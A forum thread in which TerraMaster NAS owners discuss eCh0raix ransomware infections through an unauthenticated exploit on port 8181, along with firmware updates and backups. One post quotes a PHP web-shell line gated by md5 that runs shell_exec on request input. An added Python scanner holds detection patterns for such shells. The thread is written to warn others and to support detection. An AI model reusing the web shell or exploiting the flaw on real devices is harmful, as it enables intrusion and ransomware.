My TerraMaster F2-210 has been infected by Ransomware eCh0raix / QNAPCrypt

sianderson
Posts: 293
Joined: 02 Aug 2020, 03:42
Great Britain

Post by sianderson »

I completely agree; the only reason why I am running 4.2.07 is because I am a member of the forum and saw the manual update. The average Joe that didn't do the manual update would still be vulnerable?

However, is this only happening to people who have port forwarded 8181 to the internet? Otherwise, how would an attacker be able to get through to the admin page unless another system is compromised?
F2-210

4.2.43
Spaniard
Posts: 19
Joined: 26 Dec 2020, 00:28

Post by Spaniard »

@CarlosMtnez and Jamgot

Please, can you confirm you are NOT running 4.2.07 but an earlier version?
joeh
Posts: 9
Joined: 22 Dec 2020, 02:49

Post by joeh »

@StanHK

It sucks to lose data like that. Keep in mind that although a NAS can be used for backup purposes you should always have a backup located offsite (physical or cloud) or elsewhere that doesn't have the risk of getting infected. I've had the F2-422 for a bit and when I set it up it installed 4.1.30. I went through the settings and disabled things I didn't want on. I found out about the forum when I was searching for an issue I experienced. In the forum I found out about firmware 4.2.07 and when I checked for updates on the NAS it didn't find anything. I read through the messages and that's how I found out about the manual update, which is how I have that version installed. Not sure why the NAS doesn't find the update that was released towards the beginning of the month.
ermurenz
Posts: 4
Joined: 29 Dec 2020, 10:58

Post by ermurenz »

Hi guys,
First of all, sorry for my English.
After this, same here.
On 24 December I was infected by this ransomware (eCh0raix).
All my docs files and images (not video) ended up in *.encrypt format.
1TB of data.
After some research I've found that this is the vulnerability involved:

https://www.exploit-db.com/exploits/49330
http://www.pentest.com.tr/exploits/Terr ... ution.html
https://www.ihteam.net/advisory/terrama ... abilities/

I've tested this with Metasploit and some scripts.
It's easy to access the NAS with a simple script using port 8181.
It seems more difficult using SSL port 5443.
With this, without any username and password, you can upload files, obtain a shell on /usr/www/ and launch "your" binary from there. Scary.
In that folder I found some PHP files and other stuff:
-crp_linux_arm
-sd_arm
-debug34345.php
-ssl3.php
-ssl.php

and some other PHP files containing shit like:
if(md5($_REQUEST['p'])=='9d761a9690662f2432d1fbbe7197d448'){echo shell_exec($_REQUEST['c'])
etc etc

crp_linux_arm, in my experience, was the scarier binary.
I've tested it on a virtual machine and if you launch it, the whole filesystem is scanned and encrypted. :o
I am writing these things so this doesn't happen to others.
You are advised to never publish port 8181.
If you really need to publish, do it with SSL (but don't use 5443 by default).
If you publish 8181/http on the internet, there is no antivirus or firewall that can prevent you from being attacked imho.

Anyway, from what I have read this variant cannot be solved with the decryption tool. :oops:
I've tried without success.
The only way is to back up the encrypted files and wait for new software to be developed.
I had the latest version of the stable firmware but I'm noting that there are beta versions (4.2.07 the more recent one) here.

Do you know if these are still affected by that vulnerability?

PS: the thing that pisses me off is that this vulnerability has been known for months, but there are no stable updates that fix it.
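
A triage sketch for the indicators described in the post above, added here as an example and not part of the original thread or of TerraMaster's software: it walks a copy of the web root and flags the file names the post lists, ELF binaries, and PHP that passes request parameters to a command-execution function. The function names, the 1 MB read limit and the sample tree are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path

# Names the post lists as found in /usr/www/; a name match is a lead, not proof.
REPORTED_NAMES = {"crp_linux_arm", "sd_arm", "debug34345.php", "ssl3.php", "ssl.php"}
REQ = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
# PHP command-execution call whose first argument is request data.
EXEC_CALL = re.compile(
    r"\b(?:shell_exec|system|passthru|exec|popen|proc_open)\s*\(\s*" + REQ, re.I)
# The gate quoted in the post: md5(request parameter) compared with a fixed hash.
MD5_GATE = re.compile(
    r"md5\s*\(\s*" + REQ + r"\s*\[[^\]]*\]\s*\)\s*={2,3}\s*['\"][0-9a-f]{32}['\"]", re.I)
ELF_MAGIC = b"\x7fELF"

def scan_webroot(root):
    """Return {relative path: [reasons]} for suspicious files under root."""
    root, findings = Path(root), {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        reasons = []
        if path.name in REPORTED_NAMES:
            reasons.append("name reported in thread")
        with path.open("rb") as fh:
            head = fh.read(1_000_000)  # first 1 MB is enough for these checks
        if head.startswith(ELF_MAGIC):
            reasons.append("ELF binary in web root")
        text = head.decode("latin-1")  # lossless byte-to-char mapping
        if EXEC_CALL.search(text):
            reasons.append("command execution on request input")
        if MD5_GATE.search(text):
            reasons.append("md5 password gate")
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def build_sample(root):
    """Write a constructed sample tree (not real artefacts) and return its path."""
    root = Path(root)
    (root / "index.php").write_text("<?php echo 'login page'; ?>")
    (root / "x.php").write_text(  # same shape as the fragment quoted in the post
        "<?php if(md5($_REQUEST['p'])=='" + "0" * 32 + "'){echo shell_exec($_REQUEST['c']);} ?>")
    (root / "crp_linux_arm").write_bytes(ELF_MAGIC + bytes(12))
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, why in scan_webroot(build_sample(tmp)).items():
            print(name, "->", ", ".join(why))
```

Run it against a copy of the NAS web root mounted on a separate machine; a clean result does not show the device was never compromised, since files may have been removed afterwards.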
TMroy
TerraMaster Team
Posts: 2604
Joined: 10 Mar 2020, 14:04
China

Post by TMroy »

@ermurenz
All the mentioned vulnerabilities have been fixed! Please read this article and the timeline on the bottom of the article. https://www.ihteam.net/advisory/terrama ... abilities/
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
joeh
Posts: 9
Joined: 22 Dec 2020, 02:49

Post by joeh »

@TMroy
So the IHTeam timeline shows they found out about it Nov 2nd and made TM aware and TM confirmed on Nov 17. The firmware update released early December resolved the exploits and IHTeam made it public on December 12. How come registered users weren't pushed a notification to their NAS or email making them aware that exploits were found and the update should be applied ASAP manually since automatically doesn't work? I wasn't affected by this, but if it has happened now, maybe in the past, it can definitely happen in the future.
ermurenz
Posts: 4
Joined: 29 Dec 2020, 10:58

Post by ermurenz »

@joeh
Exactly, that was my point. I update my NAS and other stuff as soon as updates become available on any update panel. In our case it is the "update & recovery" section of the NAS. Moreover, I update to the stable release, not the beta release, of course, and the stable release for my F4-210 is 4.1.32-2008031214. Right now that's the release installed on my NAS. If I try "update online", no other releases are available. Right now on my NAS's dashboard there isn't any advice about a new release. I'm glad that we have a "manual" update to do, but how could I know? It seems absurd to me that I have to connect to the forum, however official, to find out that there are updates for my NAS. That's it.
sianderson
Posts: 293
Joined: 02 Aug 2020, 03:42
Great Britain

Post by sianderson »

StanHK wrote: 29 Dec 2020, 15:25 Looking at the place where 4.2.07 is available, it seems it is a beta version, and there are many many complaints about the stability. Since when is a beta version a fix for a vulnerability?? Even if I want to use it, the download is stupidly slow. Stop lying and fix your software pls.

viewtopic.php?f=28&t=1136
Early versions of 4.2.x were a beta while they were still releasing newer versions of 4.1.x; however, 4.2.06 was meant to be the version that brought both development streams together to go forward with a single version. In my eyes 4.2.07 is meant as a mainstream update rather than a beta version, but I can't deny their actions of not putting it as an automatic update on the devices does suggest there is more to it than what I understood.

I don't think there will be a 4.1.33 version released
TMroy
TerraMaster Team
Posts: 2604
Joined: 10 Mar 2020, 14:04
China

Post by TMroy »

@StanHK

Please check if the package was crashed during your downloading, you can check the MD5 value after download. So now, please try to download it again.
sianderson
Posts: 293
Joined: 02 Aug 2020, 03:42
Great Britain

Post by sianderson »

StanHK wrote: 29 Dec 2020, 16:45 Not sure it is going to be stable.
As far as stability is concerned, mine's now solid under 4.2.07 whereas it was flaky under previous versions, so at least they now have one happy customer here, but I did jump on 4.2.07 when it was released. My NAS drive has been running for 25 days continuously. I realise this is not a lot in the eyes of most NAS drives as we are approaching 260 days for my work NAS (non-TM), but given TM's history I am impressed lol